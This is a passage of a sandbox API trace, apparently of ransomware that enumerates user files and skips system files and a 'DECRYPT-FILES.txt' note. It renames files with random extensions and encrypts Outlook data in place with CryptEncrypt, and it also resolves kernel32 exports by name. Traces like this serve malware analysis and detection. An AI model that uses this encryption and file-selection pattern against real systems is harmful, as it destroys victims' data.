(lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.168] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.168] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.168] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.168] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.168] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.168] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.168] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.168] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.168] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.168] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.168] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.168] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.168] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.168] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.169] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 75 [0078.169] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.Kws2mc") returned 82 [0078.169] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.Kws2mc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs.kws2mc"), dwFlags=0x0) returned 1 [0078.169] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.169] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.170] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.170] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6215c440, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x6215c440, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6215c440, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x9a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.xml", cAlternateFileName="")) returned 1 [0078.170] lstrcmpiW (lpString1="Outlook.xml", lpString2="DECRYPT-FILES.txt") returned 1 [0078.170] lstrcmpiW (lpString1="Outlook.xml", lpString2="autorun.inf") returned 1 [0078.170] lstrcmpiW (lpString1="Outlook.xml", lpString2="boot.ini") returned 1 [0078.170] lstrcmpiW (lpString1="Outlook.xml", lpString2="desktop.ini") returned 1 [0078.170] lstrcmpiW (lpString1="Outlook.xml", lpString2="ntuser.dat") returned 1 [0078.170] lstrcmpiW (lpString1="Outlook.xml", lpString2="iconcache.db") returned 1 [0078.170] lstrcmpiW (lpString1="Outlook.xml", lpString2="bootsect.bak") returned 1 [0078.170] lstrcmpiW (lpString1="Outlook.xml", lpString2="ntuser.dat.log") returned 1 [0078.170] lstrcmpiW (lpString1="Outlook.xml", lpString2="thumbs.db") returned -1 [0078.170] lstrcmpiW (lpString1="Outlook.xml", lpString2="Bootfont.bin") returned 1 [0078.170] lstrlenW (lpString="Outlook.xml") returned 11 [0078.170] lstrcmpiW (lpString1="xml", lpString2="lnk") returned 1 [0078.170] lstrcmpiW (lpString1="xml", lpString2="exe") returned 1 [0078.170] lstrcmpiW (lpString1="xml", lpString2="sys") returned 1 [0078.170] lstrcmpiW (lpString1="xml", lpString2="dll") returned 1 [0078.170] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned 64 [0078.170] lstrlenW (lpString="Outlook.xml") returned 11 [0078.170] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\" [0078.170] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2="Outlook.xml" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" [0078.170] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.171] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0078.171] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=2466) returned 1 [0078.171] CreateFileMappingW (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x454 [0078.171] MapViewOfFile (hFileMappingObject=0x454, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.172] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.172] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.172] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.172] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0078.173] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.173] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.173] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.173] CloseHandle (hObject=0x454) returned 1 [0078.174] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.174] WriteFile (in: hFile=0x450, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0078.174] CloseHandle (hObject=0x0) returned 0 [0078.174] CloseHandle (hObject=0x450) returned 1 [0078.175] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.175] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.176] GetTickCount () returned 0x114c0b1 [0078.176] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.176] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.176] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.176] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.176] lstrlenA (lpString="kernel32.dll") returned 12 [0078.177] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.177] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.177] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.177] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.177] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.177] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.177] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.177] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.177] lstrlenA (lpString="ADDATOMA") returned 8 [0078.177] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.177] lstrlenA (lpString="ADDATOMW") returned 8 [0078.177] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.177] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.177] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.177] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.177] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.177] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.177] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.177] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.177] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.177] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.177] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.177] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.177] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.177] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.177] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.177] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.177] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.177] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.177] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.177] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.177] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.177] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.178] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.178] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.178] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.178] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.178] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.178] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.178] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.178] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.178] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.178] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.178] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.178] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.178] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.178] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.178] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.178] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.178] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.178] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.178] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.178] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.178] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.178] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.178] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.178] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.178] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.178] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.178] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.178] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.178] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.178] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.178] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.178] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.178] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.178] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.178] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.178] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.178] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.178] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.179] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.179] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.179] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.179] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.179] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.179] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.179] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.179] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.179] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.179] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.179] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.179] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.179] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.179] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.179] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.179] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.179] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.179] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.179] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.179] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.179] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.179] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.179] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.179] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.179] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.179] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.179] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.179] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.179] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.179] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.179] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.179] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.179] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.179] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.179] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.179] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.179] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.180] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.180] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.180] lstrlenA (lpString="BEEP") returned 4 [0078.180] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.180] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.180] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.180] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.180] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.180] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.180] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.180] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.180] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.180] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.180] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.180] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.180] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.180] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.180] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.180] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.180] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.180] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.180] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.180] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.180] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.180] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.180] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.180] lstrlenA (lpString="CANCELIO") returned 8 [0078.180] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.180] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.180] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.180] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.180] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.180] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.180] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.180] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.180] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.181] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.181] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.181] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.181] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.181] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.181] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.181] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.181] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.181] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.181] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.181] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.181] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.181] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.181] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.181] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.181] lstrcpyA (in: 